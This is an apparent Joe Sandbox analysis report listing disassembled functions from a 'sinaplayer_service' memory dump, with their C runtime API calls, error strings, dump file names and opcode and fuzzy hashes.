                                                                                                                                                                                                    • Opcode ID: ff60e6265110582dff214c53019b6cac8ee69f181b0041a41a1a6057d0b1586c
                                                                                                                                                                                                    • Instruction ID: 470d71a5f7e43a17e6edd0c521533c3ec169fa69ffa2d3e0eeaafa9d6dd30352
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff60e6265110582dff214c53019b6cac8ee69f181b0041a41a1a6057d0b1586c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B01657190420D9FEF00DEA9DC41AFFB7BCFB09364F50416AE924E7290EB7555048BA1
                                                                                                                                                                                                    Function 6D094094 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D0DB524
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0DB5B0,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D0DB532
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Bad read pointer - no RTTI data!,?,6D0DB5B0,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D0DB53F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Attempted a typeid of NULL pointer!, xrefs: 6D0DB51C
                                                                                                                                                                                                    • Bad read pointer - no RTTI data!, xrefs: 6D0DB537
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::bad_exception::bad_exception$ExceptionThrow
                                                                                                                                                                                                    • String ID: Attempted a typeid of NULL pointer!$Bad read pointer - no RTTI data!
                                                                                                                                                                                                    • API String ID: 20138871-236372618
                                                                                                                                                                                                    • Opcode ID: 208e2f4e8359ba637c85ba33ab6408a77da02d4a43a6dabdb65898b63e505ee5
                                                                                                                                                                                                    • Instruction ID: 76e0dab7bc0d4de47bcd24098a148a42a4f9bf6d15f0f1470627a796bfec3eac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 208e2f4e8359ba637c85ba33ab6408a77da02d4a43a6dabdb65898b63e505ee5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF01C31904305ABFB40DBA4C944FAD73F4AF18358FA1419AE114AB2EADB71DA04DA20
                                                                                                                                                                                                    Function 6D0B06D5 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ctrlfp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1574075368-0
                                                                                                                                                                                                    • Opcode ID: 6fee1fd92e1ab165b3487ac26131cba3a66cd07bd4df186a88957573cb79da81
                                                                                                                                                                                                    • Instruction ID: 6ee6780831e5b06ab93da9e8f1a94d4023dabce924aa94fbd4e28881de3b0dbb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fee1fd92e1ab165b3487ac26131cba3a66cd07bd4df186a88957573cb79da81
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA5169A1C1C709B9EB026B25D84136EBBB8FF96340F01CB59F9D851184FFB5986582C2
                                                                                                                                                                                                    Function 6D0C3FF0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___libm_error_support.LIBCMT ref: 6D0C40A3
                                                                                                                                                                                                      • Part of subcall function 6D156158: DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6D0C417F), ref: 6D156174
                                                                                                                                                                                                      • Part of subcall function 6D156158: _errno.MSVCR120 ref: 6D156215
                                                                                                                                                                                                    • __ctrlfp.LIBCMT ref: 6D1569AF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodePointer___libm_error_support__ctrlfp_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3902546397-0
                                                                                                                                                                                                    • Opcode ID: d5b89da09f7d59a0fc627577699fad22bde41637324e192fa455efdcb6268f96
                                                                                                                                                                                                    • Instruction ID: 4042b1ebae80b3c8dce9668b4c733a3cec96a1fd11a2deeacaad7af59c427be5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5b89da09f7d59a0fc627577699fad22bde41637324e192fa455efdcb6268f96
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C5166A1C1C60AB9DB026B24D84136E7BB8FF9A340F11CB59F9D851185EFB5A86082D3
                                                                                                                                                                                                    Function 6D0EA94B Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EA974
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EA994
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EAA46
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EAAA6
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EAAAF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2717317152-0
                                                                                                                                                                                                    • Opcode ID: 4e7ca5e0138b25afbda86750dcd9407cbb7e04a3b5bb751fa6837829e94b8737
                                                                                                                                                                                                    • Instruction ID: 5a50db6baa186429e2c47d9e8faa537fb3fc8b9be2a2036b979f8af09cb1b704
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7ca5e0138b25afbda86750dcd9407cbb7e04a3b5bb751fa6837829e94b8737
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2516CB5A0461AAFDB04CFA9C581A9DFBF4FF48350B21816EE819DB340D731AA11CF90
                                                                                                                                                                                                    Function 6D0EE670 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000000), ref: 6D0EE699
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,?,?,00000000), ref: 6D0EE6B8
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,?,00000000), ref: 6D0EE76B
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000), ref: 6D0EE7CB
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,00000000), ref: 6D0EE7D3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2717317152-0
                                                                                                                                                                                                    • Opcode ID: 032aca3e2913888c7ed28bbd4d3b4576cb184e68f41b8cfeb88283ba157c15a8
                                                                                                                                                                                                    • Instruction ID: 8370ea7298aca36bbe160c42e4423928ab490097e7fe5ca39944883e6771dd8f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 032aca3e2913888c7ed28bbd4d3b4576cb184e68f41b8cfeb88283ba157c15a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90515AB5A0461AAFDB04CFA9C581A9DFBF5FF48354B11816EE819EB340D731AA11CF90
                                                                                                                                                                                                    Function 6D104F8E Relevance: 7.6, APIs: 5, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D105128,00000008), ref: 6D104FA8
                                                                                                                                                                                                    • _errno.MSVCR120(6D105128,00000008), ref: 6D104FC0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D105128,00000008), ref: 6D105118
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4106058386-0
                                                                                                                                                                                                    • Opcode ID: b9c21a17911cd78ac84b7b29be7d8609832d03290a4a0ab14b9625908945270c
                                                                                                                                                                                                    • Instruction ID: dc775ac0f8ad026b6af14963d038bb337bc38b66bf3662859994d246a1e7a72f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9c21a17911cd78ac84b7b29be7d8609832d03290a4a0ab14b9625908945270c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4106B5A682038AF712BEB9884033D77B1AB663A4F06C665D561CF1DCEFF4C5408B91
                                                                                                                                                                                                    Function 6D0962EA Relevance: 7.6, APIs: 5, Instructions: 125COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D0963D0,00000008), ref: 6D0963F4
                                                                                                                                                                                                    • _errno.MSVCR120(6D0963D0,00000008), ref: 6D0D5446
                                                                                                                                                                                                    • _errno.MSVCR120(6D0963D0,00000008), ref: 6D0D5453
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0963D0,00000008), ref: 6D0D5466
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: fe25379332076fa6944592b0f0de1a879992ef2efc7a91654b43760c916ec528
                                                                                                                                                                                                    • Instruction ID: 2ac69efdb15711e0f380e6beeb8276473b9f6716250d9f1339b34acc3139ff27
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe25379332076fa6944592b0f0de1a879992ef2efc7a91654b43760c916ec528
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 684132759987139AF7528E68854437D3BA0FB0336AFC1E146DDB08F092CB748442ABD2
                                                                                                                                                                                                    Function 6D0EF550 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Block@Context@Concurrency@@SAXXZ.MSVCR120(?,?,?,00000000,00000000,000000FF,?,?,?,?,?,?,?), ref: 6D0EF594
                                                                                                                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCMT ref: 6D0EF59B
                                                                                                                                                                                                      • Part of subcall function 6D0EF2BE: free.MSVCR120(000000FF,6D0EF5A0,?,?,?,00000000,00000000,000000FF,?,?,?,?,?,?,?), ref: 6D0EF2D5
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(000000FF,?,?,00000000,00000000), ref: 6D0EF5FE
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,6D15CFBC,000000FF,?,?,00000000), ref: 6D0EF613
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,000000FF,?,00000000,6D15CFBC,000000FF,?,?,00000000), ref: 6D0EF622
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$Block@Concurrency::details::Concurrency@@Context@DerefExceptionLockNodeNode::QueueThrowTimerfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 983439244-0
                                                                                                                                                                                                    • Opcode ID: f9648ba8c4cb1efb59a0a7cd3166d17eb6d50c7e6e218f363d49376f5a074b85
                                                                                                                                                                                                    • Instruction ID: bb0ab6abea205881378da739a5468053d69a0805c8b9ce7f4b29b1cff7fefc4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9648ba8c4cb1efb59a0a7cd3166d17eb6d50c7e6e218f363d49376f5a074b85
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C21F671604719AFDB11CF65D480A6AFBFCFF54694710852FEA6687600CB70E951CBD0
                                                                                                                                                                                                    Function 6D0AFCDA Relevance: 7.6, APIs: 5, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D0AFD98,00000010), ref: 6D0AFD28
                                                                                                                                                                                                    • __freebuf.LIBCMT ref: 6D0AFD38
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?,?,?,6D0AFD98,00000010), ref: 6D0AFD61
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AFD98,00000010), ref: 6D0D5919
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AFD98,00000010), ref: 6D0D5924
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_errno_invalid_parameter_noinfo_lock_file_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1322749186-0
                                                                                                                                                                                                    • Opcode ID: c53aff16f9656b38664775e194c3c3174a051eff7f1b110a4c6a387c5088e77c
                                                                                                                                                                                                    • Instruction ID: 0971d2a7519d6c7e8f3db52f1b1ccfda62952db02d580a6d7acbf9caefc5dc8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c53aff16f9656b38664775e194c3c3174a051eff7f1b110a4c6a387c5088e77c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221E170A04B029AF721CFA9D480B6EBBF5FF02334B51861EEA669B2D1DB74D500CB50
                                                                                                                                                                                                    Function 6D09AFF1 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000002,00000000,?,?,?,6D09BF6E,00000000), ref: 6D09B06A
                                                                                                                                                                                                    • memmove.MSVCR120(00000001,00000002,00000001,00000002,00000000,?,?,?,6D09BF6E,00000000), ref: 6D09B073
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6D09BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6D0D3F50
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,6D09BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6D0D3F5A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6D09BF6E,00000000), ref: 6D0D3F66
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfomemmovestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4167440682-0
                                                                                                                                                                                                    • Opcode ID: af6727cf59f20b271ab767bf85387911a2095cfeb52e4ea39ca4c13e1f283f11
                                                                                                                                                                                                    • Instruction ID: 4498d8c11b757dfe955f5241f69601ccecd9c69f91fce1e2806bb6c27ffe6330
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af6727cf59f20b271ab767bf85387911a2095cfeb52e4ea39ca4c13e1f283f11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0221683024D38B9EF7034A3DC89076EBBE8EF46720F10905AE9918F242E3B48841C7A1
                                                                                                                                                                                                    Function 6D0F5B3A Relevance: 7.6, APIs: 5, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0F5B41
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000030,6D0F2161,?,00000000,?,?,?), ref: 6D0F5B58
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,?), ref: 6D0F5B7B
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6D0F5BE0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?), ref: 6D0F5BEE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterH_prolog3_Leavefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2469348259-0
                                                                                                                                                                                                    • Opcode ID: db8dac87c08e687c794596c98f302c07b86f4efa1edb1eb0f7be7768fc1e90eb
                                                                                                                                                                                                    • Instruction ID: defa276a7024ddcf20c1b37b947d5b01725bdf951796f0d085702f590108d891
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8dac87c08e687c794596c98f302c07b86f4efa1edb1eb0f7be7768fc1e90eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16218E35615206AFEB08CF68D448B7EB7B5BF85354B65C059F911DB251CB70E843CB90
                                                                                                                                                                                                    Function 6D0A9529 Relevance: 7.6, APIs: 5, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnicoll_l.MSVCR120(?,?,?,00000000), ref: 6D0A9547
